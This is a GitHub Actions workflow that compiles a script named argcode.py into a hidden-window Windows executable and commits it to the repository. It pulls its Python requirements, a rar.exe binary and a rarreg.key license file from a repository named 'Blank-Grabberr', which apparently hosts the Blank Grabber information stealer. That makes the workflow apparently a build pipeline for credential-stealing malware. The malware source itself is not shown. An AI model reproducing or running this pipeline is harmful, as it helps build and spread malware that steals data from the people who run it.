name: Convert and Upload argcode.py

on:
  push:
    paths:
      - argcode.py

permissions:
  contents: write
  actions: read

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: 3.x

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install -r https://raw.githubusercontent.com/adasdasdsaf/Blank-Grabberr/main/Blank%20Grabber/Components/requirements.txt

    - name: Install pyinstaller and upx
      run: |
        pip install pyinstaller

    - name: Download rar.exe and rarreg.key
      run: |
        Invoke-WebRequest -Uri https://github.com/adasdasdsaf/Blank-Grabberr/raw/main/Blank%20Grabber/Components/rar.exe -OutFile rar.exe
        Invoke-WebRequest -Uri https://raw.githubusercontent.com/adasdasdsaf/Blank-Grabberr/main/Blank%20Grabber/Components/rarreg.key -OutFile rarreg.key

    - name: Convert argcode.py to argcode.exe
      run: |
        pyinstaller --noconfirm --onefile --windowed --add-binary rar.exe;. --add-data rarreg.key;. argcode.py
        Move-Item -Path dist\argcode.exe -Destination argcode.exe

    - name: Upload argcode.exe to repository
      uses: actions/upload-artifact@v2
      with:
        name: argcode.exe
        path: argcode.exe

    - name: Commit and push argcode.exe
      run: |
        git config --global user.name 'github-actions'
        git config --global user.email 'github-actions@github.com'
        git add argcode.exe
        git commit -m 'Add argcode.exe'
        git push
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
